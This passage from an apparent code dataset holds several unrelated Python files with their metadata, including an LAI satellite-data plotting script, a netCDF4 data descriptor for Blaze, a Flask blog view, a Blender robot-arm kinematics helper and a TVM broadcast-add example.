mapSet(mod_grid,pgd=mod_pgd_path)\nif len(trip_vars)>0:\n map_set_trip = mapSet(trip_grid)\n#local_\n# Check for netcdf files given as mask\npost_zones = check_post_zones(post_zones)\n#\n# Initialize loop over zones\n#zname,zone = post_zones.items().next()\nzname,zone = next(iter(post_zones.items()))\nmap_set,graphics_dir_zone,IPNT = prepareZone(zname,zone,map_set,graphics_dir)\n#\n# Update caller local variables\n#local_vars = currentframe(1).f_globals\nlocal_vars = currentframe().f_globals\nfor key,value in locals().items(): local_vars[key] = value\n\ndef get_zone_grid(mod_grid, zone):\n zone_grid = dict()\n zone_grid['type'] = mod_grid['type']\n zone_grid['res'] = mod_grid['res']\n zone_grid['zone'] = zone\n\n return zone_grid\n\n### Chop up Zones\nif zone is not None:\n map_set = mapSet(mod_grid, pgd=mod_pgd_path)\n map_set,graphics_dir_zone,IPNT = prepareZone(zname,zone,map_set,graphics_dir)\n\n zone_grid = get_zone_grid(mod_grid, zone)\n map_set = mapSet(zone_grid, pgd=mod_pgd_path)\n map_set,graphics_dir_zone,_ = prepareZone(zname,zone,map_set,graphics_dir)\nelse:\n map_set,graphics_dir_zone,IPNT = prepareZone(zname,zone,map_set,graphics_dir)\n\n\n\n### Load Data\nvod = 
pd.read_pickle('/cnrm/vegeo/muciaa/ldas_chain_python/ldas_curr/US00/LAIfromVODCAX_V8_2003-2018.PData')\nvodx_int = pd.read_pickle('/cnrm/vegeo/muciaa/ldas_chain_python/ldas_curr/US00/LAIfromVODCAX_V7_2003-2018_interpolated.PData')\nfile = sorted(glob.glob('/cnrm/vegeo/muciaa/ldas_chain_python/ldas_curr/US00/observations/sfx-trip/LAI_V2*.PData'),key=numericalSort)\ndf = [pd.read_pickle(file[3]),pd.read_pickle(file[4]),pd.read_pickle(file[5]),pd.read_pickle(file[6]),pd.read_pickle(file[7]),pd.read_pickle(file[8]),pd.read_pickle(file[9]),pd.read_pickle(file[10]),pd.read_pickle(file[11]),pd.read_pickle(file[12]),pd.read_pickle(file[13]),pd.read_pickle(file[14]),pd.read_pickle(file[15]),pd.read_pickle(file[16]),pd.read_pickle(file[17]),pd.read_pickle(file[18])]\nobs = pd.concat(df)\n\ndate = pd.date_range(start=\"2003-01-01 09:00:00\",end='2018-12-31 09:00:00',freq='D')\nobs = obs.reindex(date,fill_value=np.nan)\nlai_cgls = obs.interpolate(inplace=False,limit_area='inside') # assumption: gap-fill the CGLS obs ('lai_cgls' was otherwise undefined here)\n\n###################################################################\n### Data Processing \n### Only takes data from the same time as observations \n###################################################################\n\nvod[np.isnan(obs)]=np.nan\nobs[np.isnan(vod)]=np.nan\n\n\nvodx_r = vod.corrwith(obs,axis=0)\nvodx_int_r = vodx_int.corrwith(obs,axis=0)\n###################################################################\n### Graphing Function(s)\n###################################################################\n\nvodm = vod.mean(axis=1)\nobsm = obs.mean(axis=1)\nvodx_intm = vodx_int.mean(axis=1)\n\nvod2 = vodm['2012-01-01':'2012-12-31']\nobs2 = obsm['2012-01-01':'2012-12-31']\nvodx_int2 = vodx_intm['2012-01-01':'2012-12-31']\n\nplt.title('LAI and Matched LAI from VODX : 2003-2018')\n#plt.plot(obsm,color='black',label='CGLS LAI Obs',marker='.',markersize=12)\nplt.plot(obsm,color='black',label='CGLS LAI Obs')\nplt.plot(vodm,color='green',label='LAI from VODX')\nplt.plot(vodx_intm,color='red',label='LAI from VODX - Interpolated Obs')\n\nplt.legend()\nplt.show()\n\nplt.title('LAI and Matched LAI from VODX : 2012')\n#plt.plot(obs2,color='black',label='CGLS LAI Obs',marker='.',markersize=12)\nplt.plot(obs2,color='black',label='CGLS LAI Obs')\nplt.plot(vod2,color='green',label='LAI from VODX')\nplt.plot(vodx_int2,color='red',label='LAI from VODX - Interpolated Obs')\n\nplt.legend()\nplt.show()\n\n###################################################################\n### Mapping Function(s)\n###################################################################\n\ntmp = obs.copy()*np.nan\nt = tmp.mean(axis=0)\n\nfor i in range(len(t)):\n    print(i)\n    t.loc[i] = i\n\nv1 = t.values.reshape((280,140))\n\n#fig, axes = plt.subplots(1)\n\nmap = Basemap(llcrnrlon=-130, llcrnrlat=20, urcrnrlon=-60, urcrnrlat=55,lat_0=40,lon_0=-98,resolution='l')\n#map.shadedrelief()\n#cm = plt.cm.get_cmap('bwr_r')\nmap.drawcoastlines(1.5)\nmap.drawcountries(1.5)\nmap.drawmeridians(np.arange(-120,-60,10),labels=[0,0,0,1],linewidth=.5)\nmap.drawparallels(np.arange(25,55,5),labels=[1,0,0,0],linewidth=.5)\ncs1 = map.imshow(v1,interpolation='none')\n#cs1 = map.imshow(v1,cmap='RdYlGn')\n\n#cbar1 = map.colorbar(v1,location='bottom',pad=\"10%\")\n#cbar1.set_label(\"LAI [$m^2$/$m^2$]\")\n#tick_locator = ticker.MaxNLocator(nbins=4)\n#cbar1.locator = 
tick_locator\n#cbar1.update_ticks()\n\nplt.show()\n\n\n","repo_name":"amucia2/LDAS-Monde","sub_path":"US00_selectPoints_V2.py","file_name":"US00_selectPoints_V2.py","file_ext":"py","file_size_in_byte":16869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26881886550","text":"lista = []\r\ncont = 0\r\nwhile True:\r\n n = int(input('Digite um valor: '))\r\n cont += 1\r\n lista.append(n)\r\n r = str(input('Quer continuar [S/N] '))\r\n if r in 'nN':\r\n break\r\nlista.sort(reverse=True)\r\nprint('-=' * 30)\r\nprint(f'Você digitou {cont} elementos.')\r\nprint(f'Os valores em ordem decrescente são {lista}')\r\nif 5 in lista:\r\n print('O valor 5 faz parte da lista !')\r\nelse:\r\n print('O valor 5 não foi encontrado na lista!')","repo_name":"Ryotruuser/Python--Projetos","sub_path":"Exercicios/ex081.py","file_name":"ex081.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"5828397110","text":"from __future__ import absolute_import, division, print_function\n\nimport os\nimport numpy as np\nfrom dynd import nd\nimport datashape\n\nfrom . import DDesc, Capabilities\nfrom .dynd_data_descriptor import DyND_DDesc\nfrom .stream_data_descriptor import Stream_DDesc\nfrom ..optional_packages import netCDF4_is_here\nif netCDF4_is_here:\n import netCDF4\n\n\ndef get_node(f, dp):\n \"\"\"Get a node in `f` file/group with a `dp` datapath (can be nested).\"\"\"\n if dp.startswith('/'): dp = dp[1:]\n idx = dp.find('/')\n if idx >= 0:\n group = f.groups[dp[:idx]]\n return get_node(group, dp[idx+1:])\n return f.variables[dp]\n\nclass netCDF4_DDesc(DDesc):\n \"\"\"\n A Blaze data descriptor which exposes a netCDF4 dataset.\n \"\"\"\n\n def __init__(self, path, datapath, mode='r'):\n self.path = path\n self.datapath = datapath\n self.mode = mode\n\n @property\n def dshape(self):\n # This cannot be cached because the Array can change the dshape\n with netCDF4.Dataset(self.path, mode='r') as f:\n dset = get_node(f, self.datapath)\n odshape = datashape.from_numpy(dset.shape, dset.dtype)\n return odshape\n\n @property\n def capabilities(self):\n \"\"\"The capabilities for the netCDF4 arrays.\"\"\"\n with netCDF4.Dataset(self.path, mode='r') as f:\n dset = get_node(f, self.datapath)\n appendable = isinstance(dset, netCDF4.Variable)\n caps = Capabilities(\n # netCDF4 arrays can be updated\n immutable = False,\n # netCDF4 arrays are concrete\n deferred = False,\n # netCDF4 arrays are persistent\n persistent = True,\n # netCDF4 arrays can be appended efficiently\n appendable = appendable,\n # netCDF4 arrays cannot be queried efficiently\n queryable = False,\n remote = False,\n )\n return caps\n\n def dynd_arr(self):\n # Positionate at the beginning of the file\n with netCDF4.Dataset(self.path, mode='r') as f:\n dset = get_node(f, self.datapath)\n dset = nd.array(dset[:], dtype=dset.dtype)\n return dset\n\n def __array__(self):\n with netCDF4.Dataset(self.path, mode='r') as f:\n dset = get_node(f, self.datapath)\n dset = dset[:]\n return dset\n\n def __len__(self):\n with netCDF4.Dataset(self.path, mode='r') as f:\n dset = get_node(f, self.datapath)\n arrlen = len(dset)\n return arrlen\n\n def __getitem__(self, key):\n with netCDF4.Dataset(self.path, mode='r') as f:\n dset = get_node(f, self.datapath)\n # The returned arrays are temporary buffers,\n # so must be flagged as readonly.\n dyndarr = nd.asarray(dset[key], access='readonly')\n return 
DyND_DDesc(dyndarr)\n\n    def __setitem__(self, key, value):\n        # netCDF4 arrays can be updated\n        with netCDF4.Dataset(self.path, mode=self.mode) as f:\n            dset = get_node(f, self.datapath)\n            dset[key] = value\n\n    def __iter__(self):\n        f = netCDF4.Dataset(self.path, mode='r')\n        dset = get_node(f, self.datapath)\n        # Get rid of the leading dimension on which we iterate\n        dshape = datashape.from_numpy(dset.shape[1:], dset.dtype)\n        for el in dset:\n            if hasattr(el, \"nrow\"):\n                yield DyND_DDesc(nd.array(el[:], type=str(dshape)))\n            else:\n                yield DyND_DDesc(nd.array(el, type=str(dshape)))\n        f.close()\n\n    def getattr(self, name):\n        with netCDF4.Dataset(self.path, mode=self.mode) as f:\n            dset = get_node(f, self.datapath)\n            if hasattr(dset, 'cols'):\n                return DyND_DDesc(\n                    nd.asarray(getattr(dset.cols, name)[:],\n                               access='readonly'))\n            else:\n                raise IndexError(\"not a netCDF4 compound dataset\")\n\n    def append(self, values):\n        \"\"\"Append a list of values.\"\"\"\n        with netCDF4.Dataset(self.path, mode=self.mode) as f:\n            dset = get_node(f, self.datapath)\n            dset[len(dset):] = values\n\n    def remove(self):\n        \"\"\"Remove the persistent storage.\"\"\"\n        os.unlink(self.path)\n","repo_name":"code-for-india/Delivery-Optimization","sub_path":"blaze/blaze/datadescriptor/netcdf4_data_descriptor.py","file_name":"netcdf4_data_descriptor.py","file_ext":"py","file_size_in_byte":4286,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
{"seq_id":"36494117263","text":"from flask import render_template, abort\nfrom blueprints.models import BlogPost\nfrom blueprints.blog import blog\n\n\n@blog.route('/blog')\ndef view_blog():\n    posts = BlogPost.query.all()\n    posts.sort(key=lambda x: x.date, reverse=True)\n    return render_template('blog.html', posts=posts)\n\n\n@blog.route('/blog/<int:id>', methods=['GET'])\ndef view_blog_post(id):\n\n    blog_post = BlogPost.query.get(id)\n    if blog_post is not None:\n        return render_template('blog_post.html', blog_post=blog_post)\n    abort(404)\n","repo_name":"astepe/ari-blog","sub_path":"blueprints/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
{"seq_id":"71162039161","text":"# import importlib\n# importlib.sys.modules['blender-robot-arm-simulator.DH_helper']\n\nimport bpy, math\nfrom mathutils import Vector, Euler\nfrom .common import output, isPreposing\nfrom math import radians\n\n\ndef initGP(context):\n    S = context.scene\n    # Create grease pencil data if none exists\n    if not S.grease_pencil:\n        a = [a for a in bpy.context.screen.areas if a.type == 'VIEW_3D'][0]\n        override = {\n            'scene': S,\n            'screen': bpy.context.screen,\n            'object': bpy.context.object,\n            'area': a,\n            'region': a.regions[0],\n            'window': bpy.context.window,\n            'active_object': bpy.context.object\n        }\n\n        bpy.ops.gpencil.data_add(override)\n\n    return S.grease_pencil\n\n\ndef gpLayerFrame(context):\n\n    gp = initGP(context)\n\n    # Create the layer used to draw the H-D helper lines\n    if not gp.layers or \"H-D\" not in gp.layers:\n        gpl = gp.layers.new('H-D', set_active=True)\n    else:\n        gpl = gp.layers['H-D']\n\n    # Reference active GP frame or create one if none exists\n    if gpl.frames:\n        fr = gpl.active_frame\n    else:\n        fr = gpl.frames.new(1)\n\n    return fr\n\n\ndef gpColor(context, name):\n    gp = initGP(context)\n\n    if \"joint-help-line\" in gp.palettes:\n        palette = gp.palettes.get(\"joint-help-line\")\n    else:\n        palette = gp.palettes.new(\"joint-help-line\")\n\n    if name in palette.colors :\n        color = 
palette.colors.get(name)\n else:\n color = palette.colors.new()\n color.color = Vector([0.8815780282020569, 0.20415417850017548, 0.32798585295677185])\n color.name = name\n\n return color\n\n\ndef line(endpoint1, endpoint2, colorname=\"default\") :\n\n if endpoint1==None or endpoint2==None:\n return\n\n fr = gpLayerFrame(bpy.context)\n\n # Create a new stroke\n str = fr.strokes.new(colorname=colorname)\n str.draw_mode = '3DSPACE'\n\n # Add points\n str.points.add(count = 2 )\n str.points[0].co = (endpoint1)\n str.points[1].co = (endpoint2)\n\n return str\n\n\ndef clearGuide():\n fr = gpLayerFrame(bpy.context)\n if fr==None :\n return\n for str in fr.strokes.values() :\n fr.strokes.remove(str)\n\n# 各个关节的坐标系\n# 坐标系 i 对应关节 i+1\n# -1 对应世界坐标系\njoints_cosys = {\n -1: { \"O\": Vector((0,0,0)), \"z-unit\": Vector((0,0,50)), \"x-unit\": Vector((50,0,0)), \"y-unit\": None, \"H\": None } ,\n 0: { \"O\": None, \"z-unit\": None, \"x-unit\": None, \"y-unit\": None, \"H\": None } ,\n 1: { \"O\": None, \"z-unit\": None, \"x-unit\": None, \"y-unit\": None, \"H\": None } ,\n 2: { \"O\": None, \"z-unit\": None, \"x-unit\": None, \"y-unit\": None, \"H\": None } ,\n 3: { \"O\": None, \"z-unit\": None, \"x-unit\": None, \"y-unit\": None, \"H\": None } ,\n 4: { \"O\": None, \"z-unit\": None, \"x-unit\": None, \"y-unit\": None, \"H\": None } ,\n 5: { \"O\": None, \"z-unit\": None, \"x-unit\": None, \"y-unit\": None, \"H\": None } ,\n 6: { \"O\": None, \"z-unit\": None, \"x-unit\": None, \"y-unit\": None, \"H\": None } ,\n}\n\n\ndef normalize(v):\n v.normalize()\n return v\n\n# 计算两直线的公垂线\n# 算法参考 《3D数学基础》P268\n# r1(t1) 为 zn上的垂足\n# r2(t2) 为 zpre 上的垂足\n# 如果两条直线相交,r1和r2实际为同一点,公垂线长度为0,v则提供了其方向\ndef commonPerpendicular(p1, d1, p2, d2) :\n\n v = d1.cross(d2)\n\n # d1 x d2 的长度为0(受float精度的影响接近0),表示前后两个关节的 z轴平行 或 重叠\n # 该情况下,不存在公垂线\n if v.magnitude<0.002 :\n return (None, None, None)\n\n magnitude2 = v.magnitude * v.magnitude\n\n tn = (p2 - p1).cross(d2).dot(v) / magnitude2\n tpre = (p2 - p1).cross(d1).dot(v) / magnitude2\n\n # 带入射线函数,求出 r1 和 r2\n r1 = p1 + tn * d1\n r2 = p2 + tpre * d2\n\n return (r1, r2, v)\n\n# 计算两向量的夹角\ndef linesAngle(d1, d2, axes=None) :\n\n acos_value = d1.dot(d2)/(d1.magnitude*d2.magnitude)\n # 由于精度问题, 容易出现 1.0000000000000003 这样的数值\n if acos_value>1 :\n acos_value = 1.0\n if acos_value<-1 :\n acos_value = -1.0\n degree = math.acos( acos_value ) / math.pi * 180.0\n\n if degree<0.01 :\n degree = 0\n\n # 两向量叉乘的结果,和传入的axes方向相同,\n # 则 d1 到 d2 的为顺时针,返回正值\n # 否则为逆时针,返回负值\n if axes!=None :\n if d1.cross(d2).dot(axes)<0 :\n degree = -degree\n\n return degree\n\n# 计算向量 v 到 n 的投影\ndef projection(v, n):\n return n * ((v * n) / (n.magnitude * n.magnitude))\n\n\n# 返回关节 jointN 的z轴射线表达式\n# 线段的射线表示法:\n# r(t) = p + td\n# t = 0~1\ndef zAxes(jointN):\n if isinstance(jointN,str) :\n link = bpy.context.scene.objects[jointN]\n # 坐标系n 对应 关节n+1\n else:\n link = bpy.context.scene.objects[\"link\" + str(jointN)]\n p = link.matrix_world * Vector((0, 0, 0))\n d = link.matrix_world * Vector((0, 0, 50)) - p\n return (p, d)\n\n# 按照坐标系前置设定,测定 固连到各个关节的相对坐标系\ndef measurePreposingFrame(jointIdx):\n\n # 坐标系n 对应 关节n+1\n cosysN = joints_cosys[jointIdx]\n\n # 关节n 和 关节n+1 的z轴射线表达式参数\n (pN, dN) = zAxes(jointIdx)\n (pNext, dNext) = zAxes(jointIdx+1)\n\n # 计算前后z轴的公垂线\n (hN, hNext, hDirection) = commonPerpendicular(pN,dN, pNext, dNext)\n\n\n # 没有共垂线,两轴平行或重叠\n if hN==None and hNext==None :\n\n # n关节的坐标,可以时 n+1 z轴上的任意位置\n cosysN[\"O\"] = pN\n\n # 两z轴共线(重叠)\n dNP = pNext - pN\n if abs(dNP.dot(dN)-dNP.magnitude * dN.magnitude) < 0.001:\n 
cosysN[\"H\"] = cosysN[\"O\"]\n cosysN[\"x-unit\"] = bpy.context.scene.objects[\"link\" + str(jointIdx)].matrix_world * Vector((50,0,0)) # 取世界坐标系的x轴方向\n # 两z轴平行\n else :\n cosysN[\"H\"] = projection(pN-pNext, dNext) + pNext\n cosysN[\"x-unit\"] = 50 * normalize(cosysN[\"H\"]-cosysN[\"O\"]) + cosysN[\"O\"]\n\n # 存在公垂线\n else :\n # 按照DH模型的约定,关节n 的原点,在关节n+1的 z轴上\n cosysN[\"O\"] = hN\n cosysN[\"H\"] = hNext\n cosysN[\"x-unit\"] = 50 * normalize(hDirection) + cosysN[\"O\"]\n\n # z轴\n cosysN[\"z-unit\"] = 50 * normalize(dN) + cosysN[\"O\"]\n\ndef measurePreposingDHConst(jointIdx):\n\n jointDHParam = getattr(bpy.context.scene, \"joint\"+str(jointIdx)+\"_DH\")\n cosysN = joints_cosys[jointIdx]\n cosysPre = joints_cosys[jointIdx-1]\n\n # 参数a\n jointDHParam[0] = (cosysN[\"O\"] - cosysN[\"H\"]).magnitude\n\n # 参数alpha\n if (jointIdx+1) in joints_cosys :\n cosysNext = joints_cosys[jointIdx+1]\n jointDHParam[1] = linesAngle(cosysN[\"z-unit\"]-cosysN[\"O\"], cosysNext[\"z-unit\"]-cosysNext[\"O\"], cosysN[\"x-unit\"]-cosysN[\"O\"])\n else :\n # 按习惯 α6 = 0\n jointDHParam[1] = 0\n\n # 参数d\n jointDHParam[2] = (cosysN[\"O\"]-cosysPre[\"H\"]).magnitude\n # 根据和z轴的方向,确定正负\n if abs(jointDHParam[2])>0.001 :\n if (cosysN[\"O\"] - cosysPre[\"H\"]).dot( cosysN[\"z-unit\"]-cosysN[\"O\"] ) < 0 :\n jointDHParam[2] = -jointDHParam[2]\n\n # 参数theta\n jointDHParam[3] = linesAngle(cosysPre[\"x-unit\"]-cosysPre[\"O\"], cosysN[\"x-unit\"]-cosysN[\"O\"], cosysN[\"z-unit\"]-cosysN[\"O\"])\n\n return\n\n\n\n\n# 按照坐标系后置设定,测定 DH参数模型中的常量值: a, alpha, d\ndef measurePostposingFrame(cosysIdx):\n\n # 坐标系n 对应 关节n+1\n cosysN = joints_cosys[cosysIdx]\n\n # 坐标系n 和 坐标系n-1 的z轴射线表达式参数\n (pN, dN) = zAxes(cosysIdx+1)\n (pPre, dPre) = zAxes(cosysIdx)\n\n # 计算前后z轴的公垂线\n (hN, hPre, hDirection) = commonPerpendicular(pN,dN, pPre, dPre)\n\n # 没有共垂线,两轴平行或重叠\n if hN==None and hPre==None :\n\n # n关节的坐标,可以时 n+1 z轴上的任意位置\n cosysN[\"O\"] = pN\n\n # 两z轴共线(重叠)\n dNP = pN - pPre\n if abs(dNP.dot(dN)-dNP.magnitude * dN.magnitude) < 0.005:\n cosysN[\"H\"] = cosysN[\"O\"]\n linkNext = bpy.context.scene.objects[\"link\" + str(cosysIdx+1)]\n linkX = linkNext.matrix_world * Vector((50, 0, 0)) - linkNext.matrix_world * Vector((0, 0, 0))\n cosysN[\"x-unit\"] = linkX + cosysN[\"O\"] # 和连杆的x轴一致\n # 两z轴平行\n else :\n cosysN[\"H\"] = projection(pN-pPre, dPre) + pPre\n cosysN[\"x-unit\"] = 50 * normalize(cosysN[\"O\"]-cosysN[\"H\"]) + cosysN[\"O\"]\n\n # 存在公垂线\n else :\n # 按照DH模型的约定,关节n 的原点,在关节n+1的 z轴上\n cosysN[\"O\"] = hN\n cosysN[\"H\"] = hPre\n cosysN[\"x-unit\"] = -50 * normalize(hDirection) + cosysN[\"O\"]\n\n # z轴\n cosysN[\"z-unit\"] = 50 * normalize(dN) + cosysN[\"O\"]\n\n\n# 后置坐标系的 DH参数测定\ndef measurePostposingDHConst(jointN):\n\n jointDHParam = getattr(bpy.context.scene, \"joint\"+str(jointN)+\"_DH\")\n\n cosysPre = joints_cosys[jointN-1]\n cosysN = joints_cosys[jointN]\n\n # 参数a\n jointDHParam[0] = (cosysN[\"O\"] - cosysN[\"H\"]).magnitude\n\n # 参数alpha\n jointDHParam[1] = linesAngle(cosysPre[\"z-unit\"]-cosysPre[\"O\"], cosysN[\"z-unit\"]-cosysN[\"O\"], cosysN[\"x-unit\"]-cosysN[\"O\"])\n\n # 参数d\n jointDHParam[2] = (cosysN[\"H\"]-cosysPre[\"O\"]).magnitude\n\n # 根据和z轴的方向,确定正负\n if abs(jointDHParam[2])>0.001 :\n if (cosysN[\"H\"]-cosysPre[\"O\"]).dot( cosysPre[\"z-unit\"]-cosysPre[\"O\"] ) < 0 :\n jointDHParam[2] = -jointDHParam[2]\n\n # 参数theta\n jointDHParam[3] = linesAngle(cosysPre[\"x-unit\"]-cosysPre[\"O\"], cosysN[\"x-unit\"]-cosysN[\"O\"], cosysPre[\"z-unit\"]-cosysPre[\"O\"])\n\n return\n\n\ndef drawJointDHGuide(jointIdx):\n\n o = 
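joints_cosys[jointIdx][\"O\"]\n    # (added explanatory note) \"O\" is the origin of DH frame jointIdx and \"H\" the\n    # foot of the common perpendicular on the neighbouring joint axis; both are\n    # filled in by the measure*Frame() functions above. The repeated, side-effect\n    # free lookup below keeps the original statement intact.\n    o = 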
joints_cosys[jointIdx][\"O\"]\n h = joints_cosys[jointIdx][\"H\"]\n\n # 画两根线,o-p1 和 o-p2 共线,先画长的那一根,以免短的被盖住\n def drawTwoLine (pa1,pb1,color1, pa2,pb2,color2) :\n if (pb1-pa1).magnitude > (pa2-pb2).magnitude :\n line(pa1,pb1, color1)\n line(pa2,pb2, color2)\n else:\n line(pa2,pb2, color2)\n line(pa1,pb1, color1)\n\n # line a 和 x axes\n drawTwoLine(o, joints_cosys[jointIdx][\"H\"],\"DH-a\", o, joints_cosys[jointIdx][\"x-unit\"],\"x-axes\")\n\n # line d 和 z axes\n if isPreposing() :\n drawTwoLine(o, joints_cosys[jointIdx - 1][\"H\"], \"DH-d\", o, joints_cosys[jointIdx][\"z-unit\"], \"z-axes\")\n else :\n if jointIdx+1 in joints_cosys :\n drawTwoLine(h, joints_cosys[jointIdx - 1][\"O\"], \"DH-d\", o, joints_cosys[jointIdx][\"z-unit\"], \"z-axes\")\n else:\n line(o, joints_cosys[jointIdx][\"z-unit\"], \"z-axes\")\n\n\n# 重建 DH 模型\ndef measureDHModel(context):\n\n objecst = context.scene.objects\n\n for idx in range(1,7) :\n DHParam = getattr(context.scene, \"joint\"+str(idx)+\"_DH\")\n axesX = objecst[\"x\"+str(idx)]\n axesZ = objecst[\"z\"+str(idx)]\n # d\n DHParam[1] = axesX.location.z\n # a\n DHParam[2] = axesX.location.x\n # Alpha\n DHParam[3] = axesZ.rotation_euler.x/math.pi*180\n\n # update jotin variable Theta\n updateTheta(context)\n\n\ndef updateTheta(context) :\n objecst = context.scene.objects\n for idx in range(1,7) :\n frame = objecst[\"frame\"+str(idx)]\n DHParam = getattr(context.scene, \"joint\"+str(idx)+\"_DH\")\n DHParam[0] = frame.rotation_euler.z/math.pi*180\n\n\n\n# 根据 DH 模型移动 各个关节坐标\ndef applyDHModel(context) :\n\n for jointN in range(1,7) :\n\n params = getattr(context.scene,\"joint\"+str(jointN)+\"_DH\")\n\n theta = params[0]\n d = params[1]\n a = params[2]\n alpha = params[3]\n\n frameN = context.scene.objects[\"frame\"+str(jointN)]\n frameN.location = Vector((0,0,0))\n frameN.rotation_euler = Euler((0,0,radians(theta)))\n\n xN = context.scene.objects[\"x\"+str(jointN)]\n xN.location = Vector((a,0,d))\n\n zN = context.scene.objects[\"z\"+str(jointN)]\n zN.rotation_euler = Euler((radians(alpha),0,0))\n\n return\n\n\ndef setJoints(q) :\n for i in range(len(q)):\n params = getattr(bpy.context.scene,\"joint\"+str(i+1)+\"_DH\")\n params[0] = q[i]/math.pi * 180\n\n setattr(bpy.context.scene,\"joint\"+str(i+1)+\"_value\", params[0])\n \n applyDHModel(bpy.context)\n\n\ndef formatMatrix(m) :\n txt = \"Matrix([\\n\"\n for row in range(0, len(m)):\n txt += \" [\"\n for clm in range(0, len(m[row])):\n try:\n if abs(float(m[row][clm]))<0.001 :\n txt += \"0, \"\n elif abs(1-float(m[row][clm]))<0.001 :\n txt += \"1, \"\n else :\n txt += str(m[row][clm]) + \", \"\n except :\n txt += str(m[row][clm]) + \", \"\n txt += \"], \\n\"\n txt += \"])\"\n return txt\n\ndef outputDHEquation():\n\n codetpl = \"\"\"\nfrom sympy import *\n\nθ1 = Symbol(\"θ1\")\nθ2 = Symbol(\"θ2\")\nθ3 = Symbol(\"θ3\")\nθ4 = Symbol(\"θ4\")\nθ5 = Symbol(\"θ5\")\nθ6 = Symbol(\"θ6\")\n\nsimplify( \"\"\"\n exp = [\n [ \"cos(θ)\", \"-sin(θ) * cos(α)\", \"sin(θ) * sin(α)\", \"a * cos(θ)\"] ,\n [ \"sin(θ)\", \"cos(θ) * cos(α)\", \"-cos(θ) * sin(α)\", \"a * sin(θ)\"] ,\n [ \"0\", \"sin(α)\", \"cos(α)\", \"d\"] ,\n [ \"0\", \"0\", \"0\", \"1\"]\n ]\n\n # 简化代数式\n def simplify(e, dh) :\n e = e.replace(\"θ\", \"θ\" + str(joint))\n # 参数 a=0 or d=0\n if dh[0] < 0.001 or dh[2] < 0.001:\n if e.find(\"d\")>=0 or e.find(\"a\")>=0 :\n return \"0\"\n # 参数 α=90\n if 90 - dh[1] < 0.01:\n if e.find(\"cos(α)\") > -1:\n return \"0\"\n e = e.replace(\" * sin(α)\", \"\")\n e = e.replace(\"sin(α)\", \"1\")\n\n # 参数 α=0\n if dh[1] < 0.01:\n if 
e.find(\"sin(α)\") > -1:\n return \"0\"\n e = e.replace(\" * cos(α)\", \"\")\n e = e.replace(\"cos(α)\", \"1\")\n\n e = e.replace(\"a\", str(dh[0]))\n e = e.replace(\"d\", str(dh[2]))\n\n return e\n\n\n for joint in range(1,7) :\n jointDHParam = getattr(bpy.context.scene, \"joint\" + str(joint) + \"_DH\")\n m = [[\"\",\"\",\"\",\"\"],[\"\",\"\",\"\",\"\"],[\"\",\"\",\"\",\"\"],[\"\",\"\",\"\",\"\"]]\n for row in range(len(exp)) :\n for clm in range(len(exp[row])) :\n m[row][clm] = simplify( exp[row][clm], jointDHParam )\n\n if joint>1 :\n codetpl+= \" * \"\n codetpl+= formatMatrix(m)\n\n codetpl+=\" ) \\n\"\n output(codetpl)\n\n #\n # for idx in range(1,7) :\n # jointDHParam = getattr(bpy.context.scene, \"joint\" + str(idx) + \"_DH\")\n # codetpl = codetpl.replace(\"a\"+str(idx), str(jointDHParam[0]))\n # codetpl = codetpl.replace(\"α\"+str(idx), str(jointDHParam[1]))\n # codetpl = codetpl.replace(\"d\"+str(idx), str(jointDHParam[2]))\n #\n # output(codetpl)\n\n","repo_name":"aleechou/blender-robot-arm-simulator","sub_path":"DH_helper.py","file_name":"DH_helper.py","file_ext":"py","file_size_in_byte":15002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21131613338","text":"import tvm\nimport numpy as np\n\ndef broadcast_add(shape1, shape2):\n assert len(shape1) == 2 and len(shape2) == 2\n for i in range(len(shape1)):\n assert shape1[i] == shape2[i] or shape1[i] == 1 or shape2[i] == 1\n A = tvm.placeholder(shape1, name='A')\n B = tvm.placeholder(shape2, name='B')\n m = shape1[0] if shape2[0] == 1 else shape2[0]\n n = shape1[1] if shape2[1] == 1 else shape2[1]\n\n def f(x, y):\n # the type of `x` is `tvm.expr.Var`\n # the type of shape is a list of int\n ai = 0 if shape1[0] == 1 else x\n aj = 0 if shape1[1] == 1 else y\n\n bi = 0 if shape2[0] == 1 else x\n bj = 0 if shape2[1] == 1 else y\n\n return A[ai, aj] + B[bi, bj]\n C = tvm.compute((m, n), f, name='C') \n return A, B, C\n\nm, n = 3, 4\nshape1 = (m, 1)\nshape2 = (m, n)\nA, B, C = broadcast_add(shape1, shape2)\ns = tvm.create_schedule(C.op)\nprint(tvm.lower(s, [A, B], simple_mode=True))\n\nmod = tvm.build(s, [A, B, C])\n\ndef get_bcast_data(shape1, shape2, constructor=None):\n \"\"\"Return random tensors a, b\n and empty tensor c to store broadcast results between a and b\n\n shape1, shape2: shapes of input tensors\n constructor : user-defined tensor constructor\n \"\"\"\n np.random.seed(0)\n a = np.random.normal(size=shape1).astype(\"float32\")\n b = np.random.normal(size=shape2).astype(\"float32\")\n out_shape = (shape1[0] if shape2[0] == 1 else shape2[0],\n shape1[1] if shape2[1] == 1 else shape2[1])\n c = np.empty(out_shape, dtype='float32')\n if constructor:\n a, b, c = [constructor(x) for x in (a, b, c)]\n return a, b, c\n\na, b, c = get_bcast_data(shape1, shape2, tvm.nd.array)\nmod(a, b, c)\n\nnp.testing.assert_allclose(np.add(a.asnumpy(), b.asnumpy()), c.asnumpy(), atol=1e-5)\nprint(a.shape, b.shape, c.shape)\n","repo_name":"wkcn/learning_tvm","sub_path":"3.common_operators/3.1.broadcast_add.py","file_name":"3.1.broadcast_add.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"40"} +{"seq_id":"44414063771","text":"from settings import *\n\nimport random\n\nfj = [\n (-1, -1), (0, -1), (1, -1), (1, 0), (1, 1), (0, 1), (-1, 1), (-1, 0),\n]\n\n\nclass Ge:\n def __init__(self, pos):\n self.come = False\n self.pos = pos\n self.line = [\n [(pos[0], pos[1]), (pos[0] + length, pos[1])],\n 
